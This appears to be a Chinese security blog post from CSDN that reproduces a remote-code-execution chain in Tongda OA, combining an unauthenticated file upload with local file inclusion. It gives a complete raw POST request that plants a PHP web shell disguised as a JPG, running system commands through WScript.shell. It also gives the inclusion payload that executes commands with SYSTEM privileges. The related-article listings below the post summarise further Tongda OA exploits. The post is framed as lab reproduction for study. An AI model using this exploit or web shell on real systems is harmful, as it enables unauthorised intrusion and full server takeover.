漏洞复现系列--通达OA未授权上传+文件包含RCE

最新推荐文章于 2024-07-30 21:02:40 发布
最新推荐文章于 2024-07-30 21:02:40 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40007043/article/details/105011830
版权

一、漏洞情况
此漏洞是由未授权上传和本地文件包含两个漏洞组合而形成的rce漏洞
文件上传地址:
http://localhost:8083/ispirit/im/upload.php
本地文件包含地址:
http://localhost:8083/ispirit/interface/gateway.php
这个地址我看有的复现地址不一样,是/mac/gateway.php,可能和操作系统有关,需要注意下

二、漏洞影响版本
tongdaOA V11
tangdaOA 2017
tangdaOA 2016
tangdaOA 2015
tangdaOA 2013 增强版
tangdaOA 2013

三、漏洞验证
1、通达OA下载安装
下载地址:
http://www.tongda2000.com/download/down.php?VERSION=2019&code=86d3V9EzrapwAKhPkxfbNZDsfB48gbFvbS0QYsUr%2FnNWNP2e5Fn%2F&F=baidu_natural&K=
安装过程:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
2、上传图片马
在这里插入图片描述

POST /ispirit/im/upload.php HTTP/1.1
Host: 127.0.0.1:8083
Content-Length: 656
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

3、利用本地文件包含漏洞去执行刚刚上传的木马
文件包含地址:http://127.0.0.1:8083/ispirit/interface/gateway.php
POST数据:

json={"url":"/general/../../attach/im/2003/1522036437.jpg"}&cmd=net user

在这里插入图片描述
在这里插入图片描述
从上图可以看到,命令执行成功,并且权限是system权限

梦之履行地
关注
专栏目录
通达OA inc/package/down.php接口授权访问漏洞复现 [附POC]
薛定谔嘚喵博客
11-29 1469
通达OA 接口inc/package/down.php存在授权访问漏洞,该漏洞源于系统对用户传入的数据过滤不严。攻击者可借助特制的HTTP请求利用该漏洞访问敏感文件,造成信息泄露。
中国邮政办公信息处理平台
06-09
为保证用户使用OA系统更加稳定,OA二期上线后。用户在登陆OA系统前,需按照不同的操作系统及IE版本,进行客户端相应配置。
RCEphp文件上传
最新发布
m0_71332744的博客
07-30 953
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
通达+oa+php+文件+乱,通达OA文件上传+文件包含get shell复现
weixin_34338129的博客
03-17 1278
一、原理1.文件上传漏洞位置:/ispirit/im/upload.php(1) 身份绕过如果设置了P参数,则跳过auth.php:(2) 文件上传上传过滤了php,因为通达oa一般使用的是windows,所以可以使用php.绕过。不过由于上传目录不在根目录,所以还是需要进行文件包含。2.文件包含漏洞位置:/ispirit/interface/gateway.php(2013版)/mac/gat...
0基础黑客渗透测试工程师高薪就业班
01-12
不管你是0基础小白、还是运维、大学生、IT从业者、寻求新方向、黑客爱好者、渗透人员,本课程将从0基础开始将您培养成一名高薪资的网络安全工程师。从web渗透测试技术讲到红蓝对抗,工具开发,深入浅出,其中内容包括(但不限于)主要有sql注入与xss跨站脚本OWASP TOP 10, 权限提升,内网渗透与代码审计,更深层次的讲了红队技术,比如CobaltStrike工具使用、隧道等技术、免杀对抗。也讲了app、小程序渗透测试。
通达OA_文件包含漏洞
黑剑
09-08 917
复现靶场:通达2017版漏洞文件:td\webroot\ispirit\interface\gateway.php漏洞地址: /mac/gateway.php漏洞POC:json={“url”:“/general/…/…/mysql5/my.ini”}
通达OA命令执行漏洞复现(文件上传+文件包含)
谢公子的博客
03-22 4403
漏洞描述 通达OA是北京通达信科科技有限公司出品的“Office Anywhere通达网络智能办公系统”。在受影响的版本中,攻击者可以在认证的情况下向服务器上传文件。在特定版本中,还可以造成上传文件中的代码执行。该漏洞无需登录/用户交互即可触发。 漏洞等级 高危 漏洞影响版本 V11版 2017版 2016版 2015版 2013增强版 2013版 修复建议 版本 ...
通达OA授权、有限制授权、upload——rce的poc.rar
09-02
然而,正如标题和描述所指出的,这款软件存在一些安全问题,主要涉及授权访问和上传远程执行代码(RCE)的漏洞。这些漏洞如果被恶意利用,可能导致系统安全性的严重破坏。 首先,我们来探讨“授权访问”漏洞。...
通达OA任意文件上传配合文件包含导致的RCE.md
04-12
通达OA任意文件上传配合文件包含导致的RCE
致远OA-ajax.do授权文件上传漏洞1
08-08
近日,致远OA ajaxAction 文件上传漏洞利用代码披露,由于致远OA旧版本中某些接口存在授权访问,以及部分函数过滤不足,攻击者通过构造恶意请求,可在无
通达OA前台RCE加EXP任意文件上传+文件包含.py
03-18
通达OA前台RCE加EXP任意文件上传+文件包含 ...通达OA前台RCE加EXP任意文件上传+文件包含通达OA前台RCE加EXP任意文件上传+文件包含通达OA前台RCE加EXP任意文件上传+文件包含 通达OA前台RCE加EXP任意文件上传+文件包含
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
通达OA前台任意用户登录漏洞复现
m0_64769218的博客
09-17 797
通达OA是一套国内常用的办公系统,在V11.X
通达OA授权上传文件包含RCE
BROTHERYY的博客
08-20 750
一、漏洞情况 此漏洞是由授权上传和本地文件包含两个漏洞组合而形成的rce漏洞 文件上传地址: http://localhost:80/ispirit/im/upload.php 本地文件包含地址: http://localhost:80/ispirit/interface/gateway.php 需要复现的朋友私信我,我分享链接给你 安装很简单,一路next就OK。 登录账号是:admin,密码为空。 登录以后,抓取任意数据包,将数据包修改为下面的数据 POST /ispirit/im/upload.ph
通达OA任意文件删除/OA授权访问+任意文件上传RCE漏洞复现
Adminxe的博客
09-22 1569
0x00 简介 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。 今天看了好多通达OA的文章,根据护网中出现的一些0day,进行一波分析,其中感觉9hu大佬分析的很到位,然后来以此为基准,一起来看一下这个影响较深的漏洞。然后我自己感觉,出现的漏洞只是表面的一些,其中还有肯定是公布的,包括我之前在别的版本审..
通达OA11.4漏洞复现授权访问)
weixin_51716781的博客
05-10 1497
通达OA11.4漏洞复现授权访问) 本文章仅限于渗透测试使用,如出问题与作者无关,请不要做违法操作 1:在虚拟机上安装通达OA11.4版本,查看虚拟机ip 192.168.78.159 2:访问ispirit/login_code.php 获取codeuid 如图:记住UID后面使用 3:访问/logincheck_code.php文件并使用bp抓包 4:在bp中需要修改数据:2个地方:1:修改为POST包,添加UID(注意事项:返回的包中status返回是1则成功,如果是0则失败) 5:把获取的
通达OA系统11.2漏洞
qq_50854662的博客
12-02 5182
通达OA系统11.2版本为案例的Web渗透
如何入门漏洞挖掘,以及提高自己的挖掘能力
键盘的起始页
04-09 1292
0x01:前言 大家好我是米斯特团队的一员,我的id香瓜,我们团队在这次i春秋第二次漏洞挖掘大赛中,包揽了前五名,我key表哥一不小心拿了一个第一,导致很多人来加他好友问他,如何修炼漏洞挖掘能力,我今天帮大家解答一下这个疑问,哈哈哈。 漏洞挖掘是安全圈的一个核心之一,但是随着各大厂商安全意识的增强,以及各类waf的出现。一些像sql注入,文件上传,命令执行这些漏洞也不是那...
Android APP漏洞之战(9)——验证码漏洞详解
键盘的起始页
04-25 2134
开始引入CA证书校验机制,这里先会涉及到Https的单向认证机制 上述步骤4就进行证书校验的环节,而这里的证书便是将手机内置的证书和客户端的证书进行校验,来判断是否合法 1 2 3 Https原理:非对称+对称连接 (1)非对称主要是为了传输对称连接所需要密钥和证书校验 (2)对称连接是加密密码可以安全传输,就可以采用对称连接 Android4.4-Android7.0 这个阶段,Androi...
通达OA文件上传文件包含漏洞引发的RCE分析
"通达OA任意文件上传配合文件包含导致的RCE影响多个版本,包括V11版、2015-2017版、2013版以及2013增强版。利用该漏洞,攻击者可以通过Python等脚本执行命令,如`python3.pyhttp://10.0.0.1:81whoami`,获取服务器...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值